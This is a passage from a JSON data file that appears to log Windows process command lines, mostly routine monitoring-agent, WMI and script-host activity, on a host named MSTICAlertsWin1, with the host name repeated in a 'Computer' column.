-secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAle